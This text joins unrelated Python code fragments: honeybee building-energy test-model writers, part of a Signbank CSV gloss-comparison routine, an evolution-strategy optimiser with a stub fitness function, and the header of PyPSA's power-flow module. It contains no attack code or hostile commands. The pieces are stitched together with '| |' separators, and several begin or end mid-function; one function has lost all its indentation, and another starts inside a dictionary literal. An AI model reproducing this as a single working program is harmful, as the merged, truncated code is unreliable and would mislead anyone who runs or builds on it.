    room = Room.from_box('Hospital_Patient_Room', 5, 10, 3)
    room.properties.energy.program_type = \
        prog_type_lib.program_type_by_identifier('2013::Hospital::ICU_PatRm')
    room.properties.energy.add_default_ideal_air()

    # customize the ideal-air system with an economizer and heat recovery
    hvac_system = room.properties.energy.hvac.duplicate()
    hvac_system.economizer_type = 'DifferentialEnthalpy'
    hvac_system.sensible_heat_recovery = 0.81
    hvac_system.latent_heat_recovery = 0.68
    room.properties.energy.hvac = hvac_system

    # humidity-controlled setpoint derived from the program's default
    setpoint = room.properties.energy.setpoint.duplicate()
    setpoint.identifier = 'Humidity Controlled PatRm Setpt'
    setpoint.heating_setpoint = 21
    setpoint.cooling_setpoint = 24
    setpoint.humidifying_setpoint = 30
    setpoint.dehumidifying_setpoint = 55
    room.properties.energy.setpoint = setpoint

    # glazed south facade (face 3) with an overhang shifted downward
    south_face = room[3]
    south_face.apertures_by_ratio(0.4, 0.01)
    south_face.apertures[0].overhang(0.5, indoor=False)
    south_face.move_shades(Vector3D(0, 0, -0.5))

    # every face except the glazed south wall is adiabatic
    for face_index in (0, 1, 2, 4, 5):
        room[face_index].boundary_condition = boundary_conditions.adiabatic

    model = Model('Patient_Room_Test_Box', [room])
    dest_file = os.path.join(directory, 'model_complete_patient_room.json')
    with open(dest_file, 'w') as fp:
        json.dump(model.to_dict(), fp, indent=4)
def model_complete_office_floor(directory):
    """Write a core/perimeter office floor Model to model_complete_office_floor.json."""
    # footprints of the four perimeter zones surrounding a 10 x 10 core
    perimeter_footprints = (
        [Point3D(0, 0), Point3D(30, 0), Point3D(20, 10), Point3D(10, 10)],
        [Point3D(0, 0), Point3D(10, 10), Point3D(10, 20), Point3D(0, 30)],
        [Point3D(10, 20), Point3D(20, 20), Point3D(30, 30), Point3D(0, 30)],
        [Point3D(30, 0), Point3D(30, 30), Point3D(20, 20), Point3D(20, 10)],
    )
    rooms = []
    for zone_index, footprint in enumerate(perimeter_footprints):
        solid = Polyface3D.from_offset_face(Face3D(footprint), 3)
        perimeter_room = Room.from_polyface3d('PerimeterRoom{}'.format(zone_index), solid)
        perimeter_room.properties.energy.program_type = prog_type_lib.office_program
        perimeter_room.properties.energy.add_default_ideal_air()
        rooms.append(perimeter_room)
    rooms.append(Room.from_box('CoreRoom', 10, 10, 3, origin=Point3D(10, 10)))

    # turn every interior wall between the zones into an air boundary
    adjacency = Room.solve_adjacency(rooms, 0.01)
    for face_pair in adjacency['adjacent_faces']:
        face_pair[0].type = face_types.air_boundary
        face_pair[1].type = face_types.air_boundary

    # floors and ceilings are adiabatic (single-story slice of a larger building)
    for zone in rooms:
        for face in zone:
            if isinstance(face.type, (Floor, RoofCeiling)):
                face.boundary_condition = boundary_conditions.adiabatic

    model = Model('Core_Perimeter_Office_Floor', rooms)
    dest_file = os.path.join(directory, 'model_complete_office_floor.json')
    with open(dest_file, 'w') as fp:
        json.dump(model.to_dict(), fp, indent=4)
def model_complete_holes(directory):
    """Write a donut-shaped room with a holed aperture and a holed canopy shade to JSON."""
    # room whose floor plan is a 9 x 9 square with a 3 x 3 hole in the middle
    boundary = [Point3D(0, 0), Point3D(9, 0), Point3D(9, 9), Point3D(0, 9)]
    floor_hole = [Point3D(3, 3, 0), Point3D(6, 3, 0), Point3D(6, 6, 0), Point3D(3, 6, 0)]
    floor_face = Face3D(boundary, None, [floor_hole])
    room = Room.from_polyface3d('DonutZone', Polyface3D.from_offset_face(floor_face, 3))

    # aperture that itself contains a hole, hosted on whichever face fits it
    ap_boundary = [Point3D(0.5, 0, 0.5), Point3D(2.5, 0, 0.5), Point3D(2.5, 0, 2.5),
                   Point3D(0.5, 0, 2.5)]
    ap_hole = [Point3D(1, 0, 1), Point3D(2, 0, 1), Point3D(2, 0, 2), Point3D(1, 0, 2)]
    ap_geometry = Face3D(ap_boundary, None, [ap_hole])
    hole_aperture = Aperture('HoleAperture', ap_geometry)
    for face in room.faces:
        if face.geometry.is_sub_face(ap_geometry, 0.01, 1.0):
            face.add_aperture(hole_aperture)

    # orphaned canopy shade floating above the room, with two holes
    canopy_boundary = [Point3D(0, 0, 6), Point3D(9, 0, 6), Point3D(9, 9, 6), Point3D(0, 9, 6)]
    canopy_hole_1 = [Point3D(2, 2, 6), Point3D(4, 2, 6), Point3D(4, 4, 6), Point3D(2, 4, 6)]
    canopy_hole_2 = [Point3D(5, 5, 6), Point3D(7, 5, 6), Point3D(7, 7, 6), Point3D(5, 7, 6)]
    canopy = Shade('Canopy', Face3D(canopy_boundary, None, [canopy_hole_1, canopy_hole_2]))

    model = Model('Donut_Building', [room], orphaned_shades=[canopy])
    dest_file = os.path.join(directory, 'model_complete_holes.json')
    with open(dest_file, 'w') as fp:
        json.dump(model.to_dict(), fp, indent=4)
def model_energy_shoe_box(directory):
    """Write a shoe-box Model (energy properties only) to model_energy_shoe_box.json."""
    room = Room.from_box('Simple_Shoe_Box_Zone', 5, 10, 3)
    # every face except the north wall (face 1) is adiabatic
    room[0].boundary_condition = boundary_conditions.adiabatic
    for adiabatic_face in room[2:]:
        adiabatic_face.boundary_condition = boundary_conditions.adiabatic
    # glaze the north wall with a rectangular aperture pattern
    room[1].apertures_by_ratio_rectangle(0.4, 2, 0.7, 2, 0, 0.01)

    # construction set assembled from the generic module-level constructions
    shoe_box_constructions = ConstructionSet('Shoe Box Construction Set')
    shoe_box_constructions.wall_set.exterior_construction = generic_exterior_wall
    shoe_box_constructions.wall_set.interior_construction = generic_interior_wall
    shoe_box_constructions.floor_set.interior_construction = generic_interior_floor
    shoe_box_constructions.roof_ceiling_set.interior_construction = generic_interior_ceiling
    shoe_box_constructions.aperture_set.window_construction = generic_double_pane
    room.properties.energy.construction_set = shoe_box_constructions

    model = Model('Shoe_Box', [room])
    dest_file = os.path.join(directory, 'model_energy_shoe_box.json')
    with open(dest_file, 'w') as fp:
        json.dump(model.to_dict(included_prop=['energy']), fp, indent=4)
def model_energy_detailed_loads(directory):
    """Write an office box with individually assigned loads to model_energy_detailed_loads.json."""
    room = Room.from_box('Office_Test_Box', 5, 10, 3)
    # start from the (empty) plenum program, then assign each office load directly
    room.properties.energy.program_type = prog_type_lib.plenum_program
    room.properties.energy.add_default_ideal_air()
    office = prog_type_lib.office_program
    room.properties.energy.people = office.people
    room.properties.energy.lighting = office.lighting
    room.properties.energy.electric_equipment = office.electric_equipment
    room.properties.energy.infiltration = office.infiltration
    room.properties.energy.ventilation = office.ventilation
    room.properties.energy.setpoint = office.setpoint

    # all faces except the south wall (face 3) are adiabatic
    for face_index in (0, 1, 2, 4, 5):
        room[face_index].boundary_condition = boundary_conditions.adiabatic

    model = Model('Office_Model', [room])
    dest_file = os.path.join(
        directory, 'model_energy_detailed_loads.json')
    with open(dest_file, 'w') as fp:
        json.dump(model.to_dict(included_prop=['energy']), fp, indent=4)
def model_energy_fixed_interval(directory):
room = Room.from_box('Tiny_House_Office', 5, 10, 3)
room.properties.energy.program_type = prog_type_lib.office_program
room.properties.energy.add_default_ideal_air()
occ_sched = ScheduleFixedInterval(
'Random Occupancy', [round(random.random(), 4) for i in range(8760)],
schedule_types.fractional)
new_people = room.properties.energy.people.duplicate()
new_people.occupancy_schedule = occ_sched
room.properties.energy.people = new_people
south_face = room[3]
south_face.apertures_by_ratio(0.4, 0.01)
south_face.apertures[0].overhang(0.5, indoor=False)
south_face.apertures[0].overhang(0.5, indoor=True)
south_face.move_shades(Vector3D(0, 0, -0.5))
light_shelf_out = ShadeConstruction('Outdoor_Light_Shelf', 0.5, 0.5)
light_shelf_in = ShadeConstruction('Indoor_Light_Shelf', 0.7, 0.7)
south_face.apertures[0].outdoor_shades[0].properties.energy.construction = light_shelf_out
south_face.apertures[0].indoor_shades[0].properties.energy.construction = light_shelf_in
north_face = room[1]
north_face.overhang(0.25, indoor=False)
door_verts = [Point3D(2, 10, 0.1), Point3D(1, 10, 0.1),
Point3D(1, 10, 2.5), Point3D(2, 10, 2.5)]
door = Door('Front_Door', Face3D(door_verts))
north_face.add_door(door)
aperture_verts = [Point3D(4.5, 10, 1), Point3D(2.5, 10, 1),
Point3D(2.5, 10, 2.5), Point3D(4.5, 10, 2.5)]
aperture = Aperture('Front_Aperture', Face3D(aperture_verts))
north_face.add_aperture(aperture)
tree_canopy_geo = Face3D.from_regular_polygon(
6, 2, Plane(Vector3D(0, 0, 1), Point3D(5, -3, 4)))
tree_canopy = Shade('Tree_Canopy', tree_canopy_geo)
winter = [0.75] * 2190
spring = [0.75 - ((x / 2190) * 0.5) for x in range(2190)]
summer = [0.25] * 2190
fall = [0.25 + ((x / 2190) * 0.5) for x in range(2190)]
trans_sched = ScheduleFixedInterval(
'Seasonal Tree Transmittance', winter + spring + summer + fall,
schedule_types.fractional)
tree_canopy.properties.energy.transmittance_schedule = trans_sched
| |
'dataset': current_dataset,
'annotationidglosstranslation':default_annotationidglosstranslation,
'machine_key': human_key,
'human_key': human_key,
'original_machine_value': tag_names_display,
'original_human_value': tag_names_display,
'new_machine_value': new_tag_names_display,
'new_human_value': new_tag_names_display})
continue
elif human_key == 'Notes':
if new_human_value == 'None' or new_human_value == '':
continue
sorted_notes_display = get_notes_as_string(gloss)
(sorted_new_notes_display, new_note_errors, note_type_error, note_tuple_error) = \
check_existence_notes(gloss, new_human_value, note_type_error, note_tuple_error, default_annotationidglosstranslation)
if len(new_note_errors):
errors_found += new_note_errors
elif sorted_notes_display != sorted_new_notes_display:
differences.append({'pk': gloss_id,
'dataset': current_dataset,
'annotationidglosstranslation':default_annotationidglosstranslation,
'machine_key': human_key,
'human_key': human_key,
'original_machine_value': sorted_notes_display,
'original_human_value': sorted_notes_display,
'new_machine_value': sorted_new_notes_display,
'new_human_value': sorted_new_notes_display})
continue
#If not, find the matching field in the gloss, and remember its 'real' name
try:
field = fields[human_key]
machine_key = field.name
# print('SUCCESS: accessing field name: (', human_key, ')')
except KeyError:
# print('field ', human_key, ' not found in fields')
# Signbank ID is skipped, for this purpose it was popped from the fields to compare
# Skip above fields with complex values: Keywords, Signlanguages, Dialects, Relations to other signs, Relations to foreign signs, Morphology.
# print('Skipping unknown field name: (', human_key, ')')
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(
gloss_id) + '), could not identify column name: ' + str(human_key)
errors_found += [error_string]
if not column_name_error:
# error_string = 'Allowed column names are: ' + allowed_columns
error_string = 'HINT: Try exporting a CSV file to see what column names can be used.'
errors_found += [error_string]
column_name_error = True
continue
# print('SUCCESS: human_key (', human_key, '), machine_key: (', machine_key, '), new_human_value: (', new_human_value, ')')
#Try to translate the value to machine values if needed
if hasattr(field, 'field_choice_category'):
field_choices = build_choice_list(field.field_choice_category)
human_to_machine_values = {human_value: machine_value for machine_value, human_value in field_choices}
if new_human_value in ['', '0', ' ', None, 'None']:
# print('exception in new human value to machine value: ', new_human_value)
new_human_value = '-'
new_machine_value = None
# print('Import CSV: human_to_machine_values: ', human_to_machine_values)
# Because some Handshape names can start with =, a special character ' is tested for in the name
if new_human_value[:1] == '\'':
new_human_value = new_human_value[1:]
# print('Value started with single quote, revised human value: ', new_human_value)
if new_human_value in human_to_machine_values.keys():
new_machine_value = human_to_machine_values[new_human_value]
else:
new_machine_value = '0'
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(
gloss_id) + '), could not find option ' + str(new_human_value) + ' for ' + human_key
errors_found += [error_string]
continue
#Do something special for integers and booleans
elif field.__class__.__name__ == 'IntegerField':
try:
new_machine_value = int(new_human_value)
except ValueError:
new_human_value = 'None'
new_machine_value = None
elif field.__class__.__name__ == 'NullBooleanField':
new_human_value_lower = new_human_value.lower()
if new_human_value_lower == 'neutral' and (field.name in settings.HANDEDNESS_ARTICULATION_FIELDS):
new_machine_value = None
elif new_human_value_lower in ['true', 'yes', '1']:
new_machine_value = True
new_human_value = 'True'
elif new_human_value_lower == 'none':
new_machine_value = None
elif new_human_value_lower in ['false', 'no', '0']:
new_machine_value = False
new_human_value = 'False'
else:
# Boolean expected
error_string = ''
# If the new value is empty, don't count this as a type error, error_string is generated conditionally
if field.name in settings.HANDEDNESS_ARTICULATION_FIELDS:
if new_human_value != None and new_human_value != '' and new_human_value != 'None':
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(gloss_id) + '), value ' + str(new_human_value) + ' for ' + human_key + ' should be a Boolean or Neutral.'
else:
if new_human_value != None and new_human_value != '' and new_human_value != 'None':
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(gloss_id) + '), value ' + str(new_human_value) + ' for ' + human_key + ' is not a Boolean.'
if error_string:
errors_found += [error_string]
continue
#If all the above does not apply, this is a None value or plain text
else:
if new_human_value == 'None':
new_machine_value = None
else:
new_machine_value = new_human_value
#Try to translate the key to machine keys if possible
try:
# print('get original machine value gloss ', gloss_id, ' machine_key ', machine_key)
original_machine_value = getattr(gloss,machine_key)
# print('original value for field ', machine_key, ' for gloss ', gloss_id)
except:
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(
gloss_id) + '), could not get original value for field: ' + str(machine_key)
errors_found += [error_string]
continue
# elif field.__class__.__name__ == 'NullBooleanField':
#
# new_human_value_lower = new_human_value.lower()
# if new_human_value_lower == 'neutral' and (field.name in settings.HANDEDNESS_ARTICULATION_FIELDS):
# new_machine_value = None
# elif new_human_value_lower in ['true', 'yes', '1']:
# new_machine_value = True
# new_human_value = 'True'
# elif new_human_value_lower == 'none':
# new_machine_value = None
# elif new_human_value_lower in ['false', 'no', '0']:
# new_machine_value = False
# new_human_value = 'False'
#Translate back the machine value from the gloss
try:
# if original_machine_value is None:
# print(gloss_id, field.name, ' original machine value is None ', original_machine_value)
# original_machine_value = '0'
if hasattr(field, 'field_choice_category'):
# print('gloss ', gloss.__dict__)
original_machine_value = getattr(gloss, machine_key)
if original_machine_value is None:
original_machine_value = '0'
# else:
# original_machine_value = str(original_machine_value)
# print(gloss_id, ' compare original ', field.name, ' original ', original_machine_value, ' new ', new_machine_value)
field_choices = build_choice_list(field.field_choice_category)
# print('field choices: ', field_choices)
try:
original_human_value = dict(field_choices)[original_machine_value]
except:
original_human_value = '-'
print('CSV Update: Original machine value for gloss ', gloss_id, ' has an undefined choice for field ', field.name, ': ', original_machine_value)
original_machine_value = '0'
# original_human_value = getattr(gloss, 'get_' + field.name + '_display')()
# print(gloss_id, ' compare original ', field.name, ' original ', original_machine_value, ' human ', original_human_value)
elif field.__class__.__name__ == 'NullBooleanField':
# print('compare original ', field.name, ' original ', original_machine_value, ' new ', new_machine_value)
if original_machine_value is None and (field.name in settings.HANDEDNESS_ARTICULATION_FIELDS):
original_human_value = 'Neutral'
elif original_machine_value:
original_machine_value = True
original_human_value = 'True'
else:
original_machine_value = False
original_human_value = 'False'
# some legacy glosses have empty text fields of other formats
elif (field.__class__.__name__ == 'CharField' or field.__class__.__name__ == 'TextField') \
and (original_machine_value is None or original_machine_value == '-' or original_machine_value == '------' or original_machine_value == ' '):
# print(gloss_id, ' replace with empty string: ', original_machine_value)
original_machine_value = ''
original_human_value = ''
else:
value = getattr(gloss, field.name)
original_human_value = value
except:
# print('exception trying to get field choices for ', field.name)
original_human_value = '-'
error_string = 'For ' + default_annotationidglosstranslation + ' (' + str(
gloss_id) + '), could not get choice for field '+field.verbose_name+': ' + str(original_machine_value)
errors_found += [error_string]
continue
#Remove any weird char
try:
new_human_value = unescape(new_human_value)
except:
print('unescape raised exception for new_human_value: ', new_human_value)
pass
# test if blank value
original_human_value = str(original_human_value)
new_human_value = str(new_human_value)
# print("Hex values for machine key: ", machine_key)
# print('Hex original: (', ", ".join([hex(ord(x)) for x in original_human_value]), ')')
# print('Hex new: (', ", ".join([hex(ord(x)) for x in new_human_value]), ')')
s1 = re.sub(' ','',original_human_value)
s2 = re.sub(' ','',new_human_value)
# If the original value is implicitly not set, and the new value is not set, ignore this change
if (s1 == '' or s1 == 'None' or s1 == 'False') and s2 == '':
pass
#Check for change, and save your findings if there is one
elif original_machine_value != new_machine_value and new_machine_value != None:
# print('for human key: ', human_key)
# print('different: original_machine_value: ', original_machine_value, ', new machine value: ', new_machine_value)
# print('different: original_human_value: ', original_human_value, ', new human value: ', new_human_value)
if (human_key == 'WD' or human_key == 'WP') and original_human_value == 'None':
original_human_value = 'Neutral'
differences.append({'pk':gloss_id,
'dataset': current_dataset,
'annotationidglosstranslation':default_annotationidglosstranslation,
'machine_key':machine_key,
'human_key':human_key,
'original_machine_value':original_machine_value,
'original_human_value':original_human_value,
'new_machine_value':new_machine_value,
'new_human_value':new_human_value})
return (differences, errors_found, earlier_updates_same_csv, earlier_updates_lemmaidgloss)
def compare_valuedict_to_lemma(valuedict,lemma_id,my_datasets, nl,
lemmaidglosstranslations, current_lemmaidglosstranslations,
earlier_updates_same_csv, earlier_updates_lemmaidgloss):
"""Takes a dict of key-value pairs, and compares them to a lemma"""
errors_found = []
differences = []
try:
lemma = LemmaIdgloss.objects.select_related().get(pk=lemma_id)
except ObjectDoesNotExist as e:
e = 'Could not find lemma for ID ' + str(lemma_id)
errors_found.append(e)
return (differences, errors_found, earlier_updates_same_csv, earlier_updates_lemmaidgloss)
if lemma_id in earlier_updates_same_csv:
e = 'Lemma ID (' + str(lemma_id) + ') found in multiple rows (Row ' + str(nl + 1) + ').'
errors_found.append(e)
return (differences, errors_found, earlier_updates_same_csv, earlier_updates_lemmaidgloss)
else:
earlier_updates_same_csv.append(lemma_id)
count_new_nonempty_translations = 0
count_existing_nonempty_translations = 0
if lemmaidglosstranslations \
and current_lemmaidglosstranslations != lemmaidglosstranslations:
for key1 in lemmaidglosstranslations.keys():
if lemmaidglosstranslations[key1]:
count_new_nonempty_translations += 1
for key2 in current_lemmaidglosstranslations.keys():
if current_lemmaidglosstranslations[key2]:
count_existing_nonempty_translations += | |
# <reponame>ignacioct/GeneticAlgorithms
import copy
import math
import operator
import random
import sys
from concurrent import futures
import numpy as np
import requests
class FitnessFunctionCaller:
    """Evaluates the fitness of an individual from its functional (motor) values.

    ``call`` is currently a placeholder that returns a constant; the real
    fitness computation should be plugged in there.  The motor values passed
    to the constructor are retained in ``self.functional_parts`` so that the
    real implementation can use them.
    """

    def __init__(self, *args):
        """Store the functional (motor) values of the individual.

        Args:
            *args: one numeric value per motor (4 or 10 in this project).
        """
        # BUG FIX: the original accumulated the args into a *local* list and
        # then discarded it, so the motor values never reached the instance.
        self.functional_parts = list(args)

    def call(self) -> float:
        """Return the fitness value for the stored motor values.

        Placeholder implementation: always returns 1.
        """
        return 1  # TODO: replace with the real fitness function
class Individual:
    """Candidate solution: motor angles (``functional``) plus a mutation variance per motor.

    Built either with random values (no keyword arguments) or from explicit
    ``functional`` / ``variance`` keyword lists.
    """

    def __init__(self, is10, **kwargs):
        self.is10 = is10
        # note: anything other than the literal False selects the 10-motor problem
        self.motorNumber = 4 if is10 is False else 10
        if kwargs:
            # explicit chromosome supplied by the caller (e.g. crossover/mutation)
            self.functional = kwargs.get("functional", None)
            self.variance = kwargs.get("variance", None)
        else:
            # random start: angles drawn from [-180, 181), variances from [100, 360)
            self.functional = [
                np.random.uniform(-180, 181) for _ in range(self.motorNumber)
            ]
            self.variance = [
                np.random.uniform(100, 360) for _ in range(self.motorNumber)
            ]
        # sentinel: not evaluated yet (the strategies minimize fitness)
        self.fitness = sys.float_info.max

    def update_fitness(self, incoming):
        """Replace the stored fitness with a freshly computed value."""
        self.fitness = incoming

    def update_variance(self, incoming):
        """Copy the first ``motorNumber`` values of ``incoming`` into ``variance`` in place."""
        for slot in range(self.motorNumber):
            self.variance[slot] = incoming[slot]
class EvolutiveStrategyOneIndividual:
    """(1+1) evolution strategy: a single parent mutated once per generation.

    Step sizes (variances) are adapted with Rechenberg's 1/5 success rule,
    based on the success history of the last (up to) 10 generations.
    """

    def __init__(self, c, is10):
        """
        Args:
            c: coefficient for the 1/5 success rule (typically 0.8 <= c < 1).
            is10: True for the 10-motor problem, False for the 4-motor one.
        """
        self.population = 1
        self.pool = []
        for _ in range(self.population):  # reusable for bigger populations
            self.pool.append(Individual(is10))
        self.successes = []  # 1 if a generation improved the parent, else 0
        # ratio of improvement over the last 10 generations (0.0 while empty)
        self.psi = self.successes.count(1) / 10
        self.c = c
        self.evaluations = 0  # number of fitness evaluations performed so far
        self.lastFitness = sys.float_info.max  # sentinel: nothing evaluated yet

    def mutation(self):
        """Create the candidate child by Gaussian mutation of the parent's functionals."""
        self.temporalPool = []
        mutated_functional = []
        for i in range(self.pool[0].motorNumber):
            mutated_functional.append(
                self.pool[0].functional[i]
                + np.random.normal(scale=self.pool[0].variance[i])
            )
        child = Individual(
            is10=self.pool[0].is10,
            functional=mutated_functional,
            variance=self.pool[0].variance,
        )
        self.temporalPool.append(child)

    def evaluation(self):
        """Evaluate parent and child, keep the better one and adapt the variances."""
        parent_caller = FitnessFunctionCaller(*self.pool[0].functional)
        child_caller = FitnessFunctionCaller(*self.temporalPool[0].functional)
        parent_fitness = parent_caller.call()
        child_fitness = child_caller.call()
        self.evaluations += 2
        # formerBetter is True when the mutation did NOT improve on the parent
        formerBetter = parent_fitness <= child_fitness
        bestFitness = min(parent_fitness, child_fitness)
        # if the child improved, it replaces the parent
        if not formerBetter:
            self.pool = copy.deepcopy(self.temporalPool)
        del self.temporalPool
        # adapt every variance with the 1/5 success rule
        for i in range(self.pool[0].motorNumber):
            self.pool[0].variance[i] = self.ruleOneFifth(self.pool[0].variance[i])
        self.pool[0].update_fitness(bestFitness)
        # record success (1) or failure (0), keeping only the last 10 entries
        if len(self.successes) >= 10:
            self.successes.pop(0)
        self.successes.append(0 if formerBetter else 1)
        self.lastFitness = bestFitness
        self.psi = self.successes.count(1) / 10

    def trainingLoop(self, maxCycles):
        """Run up to maxCycles generations, early-stopping once a variance collapses."""
        # BUG FIX: the rolling result log must survive across generations; the
        # original re-created it every iteration, so it never held more than
        # the current generation's entry.
        formerResults = []
        for cycle in range(maxCycles):
            self.mutation()
            self.evaluation()
            if len(formerResults) > 10:
                formerResults.pop(0)
            summary = (
                "Generation: "
                + str(cycle)
                + "\tBest fitness: "
                + str(self.pool[0].fitness)
                + "\nBest chromosome: "
                + str(self.pool[0].functional)
            )
            formerResults.append(summary)
            print(summary)
            # stop once any variance is effectively zero (no more exploration)
            stopping = False
            for i in range(len(self.pool[0].functional)):
                if self.pool[0].variance[i] < 0.0001:
                    stopping = True
            if stopping:
                print("Early stopping applied")
                print(formerResults[0])
                break

    def ruleOneFifth(self, formerVariance) -> float:
        """Return the adapted variance according to the 1/5 success rule.

        If fewer than 1/5 of the recent generations improved, shrink the step
        size; if more than 1/5 improved, grow it; at exactly 1/5, keep it.
        """
        self.psi = self.successes.count(1) / 10
        if self.psi < 0.2:
            return self.c * formerVariance
        elif self.psi > 0.2:
            # BUG FIX: the original returned `self.c / formerVariance`, which
            # *inverts* the variance instead of growing it.  The 1/5 rule
            # grows the step size by dividing the variance by c (c < 1).
            return formerVariance / self.c
        else:
            return formerVariance
class EvolutiveStrategyMultiple:
"""Evolution strategy made with a population of individuals."""
def __init__(self, population, family_number, tournament_factor, is10):
self.population = population
self.pool = []
for _ in range(self.population):
indv = Individual(is10)
self.pool.append(indv)
self.family_number = family_number
self.tau = 1 / math.sqrt(2 * math.sqrt(self.pool[0].motorNumber))
self.zero_tau = 1 / math.sqrt(2 * self.pool[0].motorNumber)
self.tournament_factor = tournament_factor
self.evaluations = 0
def element_per_list(self, lista):
"""Auxiliar function; given a list of lists, picks a random for each position searching in all lists"""
temporal_list = []
for position in range(len(lista[0])):
rnd = random.randint(0, (self.family_number - 1))
temporal_list.append(lista[rnd][position])
return temporal_list
def tournament(self):
"""
Selects the best individuals by facing them to each other and keeping the best.
Returns a population of the best inidividuals
"""
len_population = self.family_number * self.population
temp_population = [] # Temporal place for the newly-created population
for _ in range(len_population):
# Get tournament size as the floored integer of the Population Size * Tournament Percentage (aka factor)
tournament_size = math.floor(self.tournament_factor * self.population)
# Selects a random fraction of the total population to participate in the tournament
tournament_selected = random.sample(range(self.population), tournament_size)
# Choose the fittest
fitnesses = []
indexes = []
for index in tournament_selected:
fitnesses.append(self.pool[index].fitness)
indexes.append(index)
fittest_index = indexes[fitnesses.index(min(fitnesses))]
fittest = self.pool[fittest_index]
temp_population.append(fittest)
return temp_population # Returning the new population
    def crossover(self, pool):
        """Return a pool of children bred from the given parents by family averaging.

        Parents are shuffled (``pool`` is shuffled IN PLACE) and consumed in
        groups of ``self.family_number``.  Each child's functional values are
        the per-position average of its family's functionals; each child's
        variance is assembled per-position from a randomly chosen parent
        (via ``element_per_list``).  Parents left over when the pool size is
        not a multiple of the family number produce no child.
        """
        temporal_pool = []
        random.shuffle(pool) # randomize the pool of individuals, to randomize crossover
        counter = 0 # controls the loops logic
        avg_functionals = [0] * pool[0].motorNumber # functional list for the newborns (must be restarted with 0-init)
        avg_variances = ([]) # variances list for the newborns (must be restarted by recasting)
        for indv in pool:
            if counter != (self.family_number - 1): # not the last member of the family
                for position in range(indv.motorNumber):
                    avg_functionals[position] += indv.functional[position] # adds each functional of the current ind to corresponding positions
                avg_variances.append(indv.variance) # adds the variance to the list of parent variances
                counter += 1
            else: # last member of the family -> extra functions
                for position in range(indv.motorNumber):
                    avg_functionals[position] += indv.functional[position]
                    # no more sums left: divide the accumulated sum by the
                    # family size to finish the average
                    avg_functionals[
                        position
                    ] /= (
                        self.family_number
                    ) # no more sums left, time to divide by family number
                avg_variances.append(indv.variance)
                # Transforming the list of lists to a list of variances, with a random variance of the parents for each position
                avg_variances = self.element_per_list(avg_variances)
                # Adding the individual to the temporal pool
                temp_indv = Individual(
                    is10=pool[0].is10,
                    functional=avg_functionals,
                    variance=avg_variances,
                )
                temporal_pool.append(temp_indv)
                # Restarting variables, as this family has finished
                counter = 0
                avg_functionals = [0] * pool[0].motorNumber
                avg_variances = []
        """
        With this implementation, if population mod family number is not zero, those parents at the end wont create any child.
        To cope with that, the parents pool is shuffled. This should not be a problem, just 1 or 2 will be excluded.
        At the end, we get the same number of children, so the rest of the operators remain unchanged, and convergence will work just fine.
        """
        return temporal_pool
    def mutation(self, pool, scaling):
        """Mutate every individual in ``pool`` IN PLACE and return the pool.

        Functional values receive additive Gaussian noise scaled by the
        individual's own variance.  Variances then self-adapt with a
        log-normal scheme: always one factor exp(N(0, tau)); with
        ``scaling=True`` an additional factor exp(N(0, zero_tau)).

        NOTE: the exact order of the np.random.normal draws is part of the
        behavior (it fixes the RNG stream) — do not reorder these calls.
        """
        for individual in pool:
            for i in range(individual.motorNumber):
                # Functional mutation
                individual.functional[i] += np.random.normal(
                    loc=0, scale=individual.variance[i]
                )
                # Variance mutation
                if scaling is True:
                    # two-factor log-normal update (per-motor + global factor)
                    individual.variance[i] = (
                        individual.variance[i]
                        * np.exp(np.random.normal(loc=0, scale=self.tau))
                        * np.exp(np.random.normal(loc=0, scale=self.zero_tau))
                    )
                else:
                    # single-factor log-normal update
                    individual.variance[i] = individual.variance[i] * np.exp(
                        np.random.normal(loc=0, scale=self.tau)
                    )
        return pool
def concurrent_evaluation(self, pool):
"""Given a pool of individuals, return a list with its fitness functions"""
callers = [] # list of caller objects of individuals
for individual in pool:
individual_caller = FitnessFunctionCaller(*(i for i in individual.functional))
callers.append(individual_caller)
with futures.ThreadPoolExecutor(max_workers=50) as execute:
future = [execute.submit(callers[i].call) for i in range(len(pool))]
self.evaluations += len(future)
fitnesses = [f.result() for f in future] # list of fitness of the pool
return fitnesses
def selection(self, children_pool):
"""Given a pool of mutated children, and using self.pool (parent's pool), selects the best individuals"""
fitnesses = []
combined_pool = copy.deepcopy(
self.pool
) # introducing parents to a combined pool
combined_pool.extend(children_pool) | |
# pypsa/pf.py  (scraper artifact "<reponame>…<filename>…" removed: it was not valid Python)
## Copyright 2015-2021 PyPSA Developers
## You can find the list of PyPSA Developers at
## https://pypsa.readthedocs.io/en/latest/developers.html
## PyPSA is released under the open source MIT License, see
## https://github.com/PyPSA/PyPSA/blob/master/LICENSE.txt
"""Power flow functionality.
"""
__author__ = "PyPSA Developers, see https://pypsa.readthedocs.io/en/latest/developers.html"
__copyright__ = ("Copyright 2015-2021 PyPSA Developers, see https://pypsa.readthedocs.io/en/latest/developers.html, "
"MIT License")
import logging
logger = logging.getLogger(__name__)
from scipy.sparse import issparse, csr_matrix, csc_matrix, hstack as shstack, vstack as svstack, dok_matrix
from numpy import r_, ones
from scipy.sparse.linalg import spsolve
from numpy.linalg import norm
from pandas.api.types import is_list_like
import numpy as np
import pandas as pd
import networkx as nx
from operator import itemgetter
import time
from .descriptors import get_switchable_as_dense, allocate_series_dataframes, Dict, zsum, degree
pd.Series.zsum = zsum
def normed(s):
    """Scale *s* so that its entries sum to one."""
    total = s.sum()
    return s / total
def real(X):
    """Element-wise real part of *X* (pandas object) as a plain ndarray."""
    return X.to_numpy().real
def imag(X):
    """Element-wise imaginary part of *X* (pandas object) as a plain ndarray."""
    return X.to_numpy().imag
def _as_snapshots(network, snapshots):
if snapshots is None:
snapshots = network.snapshots
if not is_list_like(snapshots):
snapshots = pd.Index([snapshots])
if not isinstance(snapshots, pd.MultiIndex):
snapshots = pd.Index(snapshots)
assert snapshots.isin(network.snapshots).all()
return snapshots
def _allocate_pf_outputs(network, linear=False):
    """Pre-allocate the output time-series DataFrames of a power flow.

    Active power (and voltage for buses) is always allocated; the
    non-linear flow additionally needs reactive-power columns, except for
    links, which carry no reactive power.
    """
    link_cols = ["p" + col[3:] for col in network.links.columns if col[:3] == "bus"]
    to_allocate = {
        'Generator': ['p'],
        'Load': ['p'],
        'StorageUnit': ['p'],
        'Store': ['p'],
        'ShuntImpedance': ['p'],
        'Bus': ['p', 'v_ang', 'v_mag_pu'],
        'Line': ['p0', 'p1'],
        'Transformer': ['p0', 'p1'],
        'Link': link_cols,
    }
    if not linear:
